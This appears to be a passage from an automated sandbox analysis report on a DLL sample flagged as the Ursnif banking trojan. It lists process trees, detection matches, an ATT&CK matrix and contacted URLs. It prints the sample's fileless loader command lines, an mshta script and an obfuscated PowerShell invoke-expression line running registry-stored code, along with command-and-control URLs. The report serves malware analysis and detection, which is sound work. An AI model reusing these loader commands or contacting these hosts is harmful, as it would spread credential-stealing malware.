                      Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Jqlc='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Jqlc).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name axgpbo -value gp; new-alias -name slctai -value iex; slctai ([System.Text.Encoding]::ASCII.GetString((axgpbo "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name axgpbo -value gp; new-alias -name slctai -value iex; slctai ([System.Text.Encoding]::ASCII.GetString((axgpbo "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name axgpbo -value gp; new-alias -name slctai -value iex; slctai ([System.Text.Encoding]::ASCII.GetString((axgpbo "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5F15.tmp" "c:\Users\user\AppData\Local\Temp\m5pod5s5\CSCDE04DA8616441A6AC3074D39CFFC1D3.TMP"
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES73F5.tmp" "c:\Users\user\AppData\Local\Temp\a1gxko15\CSCE08F5B5052974B07835021DDCFF1297.TMP"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: explorer.exe, 0000001D.00000000.434255940.0000000005610000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.425378070.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001D.00000000.434267332.0000000005E60000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 0000001D.00000000.425378070.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001D.00000000.455054907.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.424853777.00000000005C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 0000001D.00000000.425378070.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001D.00000000.455231831.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001D.00000000.455646233.0000000000B50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager,
                      Source: explorer.exe, 0000001D.00000000.425378070.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001D.00000000.455231831.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001D.00000000.455646233.0000000000B50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03433365 cpuid
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_034881F1 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_034341FA HeapFree,GetSystemTimeAsFileTime,HeapFree,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03436D78 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03433365 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000002.00000003.297325888.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297834584.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297429352.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297681439.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.343681335.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297590765.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.415812093.000001E636EFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.416371744.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.344393693.00000000053EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297638770.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297792500.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.416255152.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.342664941.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297847872.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.397268016.0000000006168000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5132, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6644, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 4084, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.50494a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.5596b40.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.5596b40.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.55694a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.3430000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.50494a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.55694a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.54ea4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.54ea4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.464317231.000000000526F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.343634422.0000000005569000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.461814934.0000000005049000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.414668534.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.413947295.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.343553499.00000000054EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.415531783.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000002.00000003.297325888.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297834584.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297429352.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297681439.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.343681335.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297590765.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.415812093.000001E636EFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.416371744.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.344393693.00000000053EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297638770.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297792500.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.416255152.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.342664941.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297847872.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.397268016.0000000006168000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5132, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6644, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 4084, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.50494a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.5596b40.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.5596b40.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.55694a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.3430000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.50494a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.55694a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.54ea4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.54ea4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.464317231.000000000526F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.343634422.0000000005569000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.461814934.0000000005049000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.414668534.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.413947295.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.343553499.00000000054EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.415531783.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      1
                      Valid Accounts                      		1
                      Windows Management Instrumentation                      		1
                      Valid Accounts                      		1
                      Valid Accounts                      		1
                      Obfuscated Files or Information                      		1
                      Input Capture                      		1
                      System Time Discovery                      		Remote Services11
                      Archive Collected Data                      		Exfiltration Over Other Network Medium2
                      Ingress Tool Transfer                      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                      Data Encrypted for Impact
                      Default Accounts3
                      Native API                      		Boot or Logon Initialization Scripts1
                      Access Token Manipulation                      		1
                      File Deletion                      		LSASS Memory1
                      Account Discovery                      		Remote Desktop Protocol1
                      Email Collection                      		Exfiltration Over Bluetooth2
                      Encrypted Channel                      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain Accounts1
                      Command and Scripting Interpreter                      		Logon Script (Windows)813
                      Process Injection                      		1
                      Masquerading                      		Security Account Manager3
                      File and Directory Discovery                      		SMB/Windows Admin Shares1
                      Input Capture                      		Automated Exfiltration1
                      Non-Application Layer Protocol                      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                      Valid Accounts                      		NTDS25
                      System Information Discovery                      		Distributed Component Object ModelInput CaptureScheduled Transfer11
                      Application Layer Protocol                      		SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Access Token Manipulation                      		LSA Secrets1
                      Query Registry                      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common31
                      Virtualization/Sandbox Evasion                      		Cached Domain Credentials11
                      Security Software Discovery                      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items813
                      Process Injection                      		DCSync31
                      Virtualization/Sandbox Evasion                      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                      Rundll32                      		Proc Filesystem3
                      Process Discovery                      		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                      Application Window Discovery                      		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
                      System Owner/User Discovery                      		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput Capture11
                      Remote System Discovery                      		Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                      Compromise Software Supply ChainUnix ShellLaunchdLaunchdRename System UtilitiesKeylogging1
                      System Network Configuration Discovery                      		Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 620332 Sample: xaj0e933Uv.dll Startdate: 04/05/2022 Architecture: WINDOWS Score: 100 66 Snort IDS alert for network traffic 2->66 68 Found malware configuration 2->68 70 Multi AV Scanner detection for submitted file 2->70 72 2 other signatures 2->72 11 loaddll32.exe 1 2->11         started        13 mshta.exe 19 2->13         started        process3 process4 15 cmd.exe 1 11->15         started        17 powershell.exe 33 13->17         started        signatures5 20 rundll32.exe 1 6 15->20         started        58 Injects code into the Windows Explorer (explorer.exe) 17->58 60 Writes to foreign memory regions 17->60 62 Modifies the context of a thread in another process (thread injection) 17->62 64 2 other signatures 17->64 24 csc.exe 3 17->24         started        27 csc.exe 3 17->27         started        29 conhost.exe 17->29         started        process6 dnsIp7 56 185.189.151.28, 49769, 80 AS-SOFTPLUSCH Switzerland 20->56 74 System process connects to network (likely due to code injection or exploit) 20->74 76 Writes to foreign memory regions 20->76 78 Allocates memory in foreign processes 20->78 80 3 other signatures 20->80 31 control.exe 1 20->31         started        52 C:\Users\user\AppData\Local\...\m5pod5s5.dll, PE32 24->52 dropped 34 cvtres.exe 1 24->34         started        54 C:\Users\user\AppData\Local\...\a1gxko15.dll, PE32 27->54 dropped 36 cvtres.exe 1 27->36         started        file8 signatures9 process10 signatures11 90 Changes memory attributes in foreign processes to executable or writable 31->90 92 Injects code into the Windows Explorer (explorer.exe) 31->92 94 Writes to foreign memory regions 31->94 96 4 other signatures 31->96 38 explorer.exe 2 31->38 injected process12 signatures13 82 Self deletion via cmd delete 38->82 84 Disables SPDY (HTTP compression, likely to perform web injects) 38->84 41 cmd.exe 1 38->41         started        44 RuntimeBroker.exe 38->44 injected 46 cmd.exe 38->46         started        process14 signatures15 86 Uses ping.exe to sleep 41->86 88 Uses ping.exe to check the status of other devices and networks 41->88 48 conhost.exe 41->48         started        50 PING.EXE 1 41->50         started        process16

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      xaj0e933Uv.dll40%VirustotalBrowse
                      xaj0e933Uv.dll48%ReversingLabsWin32.Trojan.Zenpak
                      xaj0e933Uv.dll100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      2.2.rundll32.exe.3430000.0.unpack100%AviraHEUR/AGEN.1245293Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      l-0007.l-dc-msedge.net0%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://185.189.151.28/0%Avira URL Cloudsafe
                      http://https://file://USER.ID%lu.exe/upd0%Avira URL Cloudsafe
                      http://185.189.151.28/drew/yaLRzubGjQS/CFxKDeNAAfhLlC/CaygnSUs24bnRCfVOMlKd/kOu58i9k96sMGpEh/2ImNOGS0%Avira URL Cloudsafe
                      http://crl.osofts/Microt00%URL Reputationsafe
                      http://185.189.151.28/drew/1WYEBXmiF_2FMnySkI/AGFp1zkHl/1n_2BEbfMMGs7_2FFktP/VnEJxGiu_2BRheq2fuh/m_20%Avira URL Cloudsafe
                      http://constitution.org/usdeclar.txt0%URL Reputationsafe
                      http://crl.micro0%URL Reputationsafe
                      http://185.189.151.28/drew/DI9hOfnq4sis3AGOPt/_2FSN_2BC/vQMmpDQPqFMgJd7cY2BM/bpPiaoMoE2NRqo_2F46/T_2F2moLttcApM2j8JSDhs/WTmAL93U1NjUV/LMXna7GA/0XrWXSOJuSDBIpGqh8yB0Uw/8wBvAy1ROY/CU6_2BgS3mg1oC_2F/fr7BBq_2FOIM/8zgmlDNHCEg/MQH_2B5kPaL7jc/fyWcKgX2hWtfe66c_2BLA/pYfH_2BKPQZE6m8n/dgy8gM_2BVyJKF1/06D2L7PXyZQ5x_2F0m/7pDuXDGuxyU/cHq.jlk0%Avira URL Cloudsafe
                      http://185.189.151.28/drew/DI9hOfnq4sis3AGOPt/_2FSN_2BC/vQMmpDQPqFMgJd7cY2BM/bpPiaoMoE2NRqo_2F46/T_20%Avira URL Cloudsafe
                      http://185.189.151.28/drew/yaLRzubGjQS/CFxKDeNAAfhLlC/CaygnSUs24bnRCfVOMlKd/kOu58i9k96sMGpEh/2ImNOGSnuowiNkO/ip_2FJtr3_2FyC3y34/NWeB6KDbS/szu4WIEy31uBJrZBRkk7/BA3lZi_2FOvOpDSYS4s/rj2HYxhZ8zs8SSN1QxOHNt/a0noZ7RHbBD3e/0lyarAzU/kswi_2B_2Bji3xmfI9dMO1H/eF7wdYyOYS/J0KjUNI3Yrq9HIDIZ/2ePpl9Tr16LA/Mto8yX4U3i1XH7H/1gu.jlk0%Avira URL Cloudsafe
                      http://constitution.org/usdeclar.txtC:0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      l-0007.l-dc-msedge.net
                      		13.107.43.16
                      		truetrueunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://185.189.151.28/drew/DI9hOfnq4sis3AGOPt/_2FSN_2BC/vQMmpDQPqFMgJd7cY2BM/bpPiaoMoE2NRqo_2F46/T_2F2moLttcApM2j8JSDhs/WTmAL93U1NjUV/LMXna7GA/0XrWXSOJuSDBIpGqh8yB0Uw/8wBvAy1ROY/CU6_2BgS3mg1oC_2F/fr7BBq_2FOIM/8zgmlDNHCEg/MQH_2B5kPaL7jc/fyWcKgX2hWtfe66c_2BLA/pYfH_2BKPQZE6m8n/dgy8gM_2BVyJKF1/06D2L7PXyZQ5x_2F0m/7pDuXDGuxyU/cHq.jlktrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://185.189.151.28/drew/yaLRzubGjQS/CFxKDeNAAfhLlC/CaygnSUs24bnRCfVOMlKd/kOu58i9k96sMGpEh/2ImNOGSnuowiNkO/ip_2FJtr3_2FyC3y34/NWeB6KDbS/szu4WIEy31uBJrZBRkk7/BA3lZi_2FOvOpDSYS4s/rj2HYxhZ8zs8SSN1QxOHNt/a0noZ7RHbBD3e/0lyarAzU/kswi_2B_2Bji3xmfI9dMO1H/eF7wdYyOYS/J0KjUNI3Yrq9HIDIZ/2ePpl9Tr16LA/Mto8yX4U3i1XH7H/1gu.jlktrue
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://185.189.151.28/rundll32.exe, 00000002.00000003.343421322.0000000003345000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://https://file://USER.ID%lu.exe/updrundll32.exe, 00000002.00000003.397268016.0000000006168000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.415812093.000001E636EFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.416371744.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.416255152.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      http://185.189.151.28/drew/yaLRzubGjQS/CFxKDeNAAfhLlC/CaygnSUs24bnRCfVOMlKd/kOu58i9k96sMGpEh/2ImNOGSrundll32.exe, 00000002.00000003.352335631.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.343411047.0000000003337000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.463215948.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.343421322.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.462912016.00000000032EA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.352328086.0000000003338000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://crl.osofts/Microt0powershell.exe, 00000012.00000003.560046822.000001E63635E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://185.189.151.28/drew/1WYEBXmiF_2FMnySkI/AGFp1zkHl/1n_2BEbfMMGs7_2FFktP/VnEJxGiu_2BRheq2fuh/m_2rundll32.exe, 00000002.00000003.343421322.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.462912016.00000000032EA000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://constitution.org/usdeclar.txtrundll32.exe, 00000002.00000003.397268016.0000000006168000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.415812093.000001E636EFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.416371744.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.416255152.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
